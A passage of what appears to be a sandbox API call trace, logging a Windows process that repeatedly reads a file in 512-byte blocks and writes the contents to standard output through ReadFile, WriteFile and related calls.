lpBuffer=0x12f0ec*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.929] GetFileType (hFile=0x50) returned 0x1 [0202.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.929] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.929] GetFileType (hFile=0x50) returned 0x1 [0202.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.929] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e190*=0x20, lpOverlapped=0x0) returned 1 [0202.929] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.929] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e17c | out: lpNewFilePointer=0x0) returned 1 [0202.929] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.929] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.929] GetFileType (hFile=0x50) returned 0x1 [0202.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.929] GetFileType (hFile=0x50) returned 0x1 [0202.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.929] WriteFile (in: hFile=0x50, lpBuffer=0x12efac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.929] GetFileType (hFile=0x50) returned 0x1 [0202.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.929] WriteFile (in: hFile=0x50, lpBuffer=0x12effc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12effc*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.929] GetFileType (hFile=0x50) returned 0x1 [0202.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.930] WriteFile (in: hFile=0x50, lpBuffer=0x12f04c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f04c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.930] GetFileType (hFile=0x50) returned 0x1 [0202.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.930] WriteFile (in: hFile=0x50, lpBuffer=0x12f09c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f09c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.930] GetFileType (hFile=0x50) returned 0x1 [0202.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.930] WriteFile (in: hFile=0x50, lpBuffer=0x12f0ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f0ec*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.930] GetFileType (hFile=0x50) returned 0x1 [0202.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.930] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.930] GetFileType (hFile=0x50) returned 0x1 [0202.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.930] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e190*=0x20, lpOverlapped=0x0) returned 1 [0202.930] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.930] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e17c | out: lpNewFilePointer=0x0) returned 1 [0202.930] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.930] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.930] GetFileType (hFile=0x50) returned 0x1 [0202.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.930] GetFileType (hFile=0x50) returned 0x1 [0202.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.930] WriteFile (in: hFile=0x50, lpBuffer=0x12efac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.930] GetFileType (hFile=0x50) returned 0x1 [0202.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.930] WriteFile (in: hFile=0x50, lpBuffer=0x12effc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12effc*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.931] GetFileType (hFile=0x50) returned 0x1 [0202.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.931] WriteFile (in: hFile=0x50, lpBuffer=0x12f04c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f04c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.931] GetFileType (hFile=0x50) returned 0x1 [0202.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.931] WriteFile (in: hFile=0x50, lpBuffer=0x12f09c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f09c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.931] GetFileType (hFile=0x50) returned 0x1 [0202.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.931] WriteFile (in: hFile=0x50, lpBuffer=0x12f0ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f0ec*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.931] GetFileType (hFile=0x50) returned 0x1 [0202.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.931] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.931] GetFileType (hFile=0x50) returned 0x1 [0202.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.931] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e190*=0x20, lpOverlapped=0x0) returned 1 [0202.931] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.931] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e17c | out: lpNewFilePointer=0x0) returned 1 [0202.931] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.931] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.931] GetFileType (hFile=0x50) returned 0x1 [0202.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.931] GetFileType (hFile=0x50) returned 0x1 [0202.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.931] WriteFile (in: hFile=0x50, lpBuffer=0x12efac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.932] GetFileType (hFile=0x50) returned 0x1 [0202.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.932] WriteFile (in: hFile=0x50, lpBuffer=0x12effc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12effc*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.932] GetFileType (hFile=0x50) returned 0x1 [0202.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.932] WriteFile (in: hFile=0x50, lpBuffer=0x12f04c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f04c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.932] GetFileType (hFile=0x50) returned 0x1 [0202.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.932] WriteFile (in: hFile=0x50, lpBuffer=0x12f09c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f09c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.932] GetFileType (hFile=0x50) returned 0x1 [0202.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.932] WriteFile (in: hFile=0x50, lpBuffer=0x12f0ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f0ec*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.932] GetFileType (hFile=0x50) returned 0x1 [0202.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.932] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.932] GetFileType (hFile=0x50) returned 0x1 [0202.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.932] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e190*=0x20, lpOverlapped=0x0) returned 1 [0202.932] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.932] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e17c | out: lpNewFilePointer=0x0) returned 1 [0202.933] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.933] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.933] GetFileType (hFile=0x50) returned 0x1 [0202.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.933] GetFileType (hFile=0x50) returned 0x1 [0202.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.933] WriteFile (in: hFile=0x50, lpBuffer=0x12efac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.933] GetFileType (hFile=0x50) returned 0x1 [0202.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.933] WriteFile (in: hFile=0x50, lpBuffer=0x12effc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12effc*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.933] GetFileType (hFile=0x50) returned 0x1 [0202.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.933] WriteFile (in: hFile=0x50, lpBuffer=0x12f04c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f04c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.933] GetFileType (hFile=0x50) returned 0x1 [0202.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.933] WriteFile (in: hFile=0x50, lpBuffer=0x12f09c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f09c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.933] GetFileType (hFile=0x50) returned 0x1 [0202.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.933] WriteFile (in: hFile=0x50, lpBuffer=0x12f0ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f0ec*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.933] GetFileType (hFile=0x50) returned 0x1 [0202.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.933] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.933] GetFileType (hFile=0x50) returned 0x1 [0202.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.933] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e190*=0x20, lpOverlapped=0x0) returned 1 [0202.934] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.934] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e17c | out: lpNewFilePointer=0x0) returned 1 [0202.934] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.934] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.934] GetFileType (hFile=0x50) returned 0x1 [0202.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.934] GetFileType (hFile=0x50) returned 0x1 [0202.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.934] WriteFile (in: hFile=0x50, lpBuffer=0x12efac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.934] GetFileType (hFile=0x50) returned 0x1 [0202.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.934] WriteFile (in: hFile=0x50, lpBuffer=0x12effc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12effc*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.934] GetFileType (hFile=0x50) returned 0x1 [0202.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.934] WriteFile (in: hFile=0x50, lpBuffer=0x12f04c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f04c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.934] GetFileType (hFile=0x50) returned 0x1 [0202.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.934] WriteFile (in: hFile=0x50, lpBuffer=0x12f09c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f09c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.934] GetFileType (hFile=0x50) returned 0x1 [0202.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.934] WriteFile (in: hFile=0x50, lpBuffer=0x12f0ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f0ec*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.935] GetFileType (hFile=0x50) returned 0x1 [0202.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.935] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.935] GetFileType (hFile=0x50) returned 0x1 [0202.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.935] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e190*=0x20, lpOverlapped=0x0) returned 1 [0202.935] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.935] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e17c | out: lpNewFilePointer=0x0) returned 1 [0202.935] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.935] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.935] GetFileType (hFile=0x50) returned 0x1 [0202.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.935] GetFileType (hFile=0x50) returned 0x1 [0202.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.935] WriteFile (in: hFile=0x50, lpBuffer=0x12efac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.935] GetFileType (hFile=0x50) returned 0x1 [0202.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.935] WriteFile (in: hFile=0x50, lpBuffer=0x12effc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12effc*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.935] GetFileType (hFile=0x50) returned 0x1 [0202.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.935] WriteFile (in: hFile=0x50, lpBuffer=0x12f04c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f04c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.935] GetFileType (hFile=0x50) returned 0x1 [0202.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.936] WriteFile (in: hFile=0x50, lpBuffer=0x12f09c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f09c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.936] GetFileType (hFile=0x50) returned 0x1 [0202.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.936] WriteFile (in: hFile=0x50, lpBuffer=0x12f0ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f0ec*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.936] GetFileType (hFile=0x50) returned 0x1 [0202.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.936] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.936] GetFileType (hFile=0x50) returned 0x1 [0202.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.936] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e190*=0x20, lpOverlapped=0x0) returned 1 [0202.936] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.936] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e17c | out: lpNewFilePointer=0x0) returned 1 [0202.936] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.936] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.936] GetFileType (hFile=0x50) returned 0x1 [0202.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.936] GetFileType (hFile=0x50) returned 0x1 [0202.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.936] WriteFile (in: hFile=0x50, lpBuffer=0x12efac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.936] GetFileType (hFile=0x50) returned 0x1 [0202.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.936] WriteFile (in: hFile=0x50, lpBuffer=0x12effc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12effc*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.936] GetFileType (hFile=0x50) returned 0x1 [0202.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.936] WriteFile (in: hFile=0x50, lpBuffer=0x12f04c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f04c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.937] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.937] GetFileType (hFile=0x50) returned 0x1 [0202.937] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.937] WriteFile (in: hFile=0x50, lpBuffer=0x12f09c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f09c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.937] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.937] GetFileType (hFile=0x50) returned 0x1 [0202.937] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.937] WriteFile (in: hFile=0x50, lpBuffer=0x12f0ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f0ec*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.937] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.937] GetFileType (hFile=0x50) returned 0x1 [0202.937] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.937] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.937] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.937] GetFileType (hFile=0x50) returned 0x1 [0202.937] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.937] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e190*=0x20, lpOverlapped=0x0) returned 1 [0202.937] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.937] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e17c | out: lpNewFilePointer=0x0) returned 1 [0202.937] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.937] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.937] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.937] GetFileType (hFile=0x50) returned 0x1 [0202.938] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.938] GetFileType (hFile=0x50) returned 0x1 [0202.938] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.938] 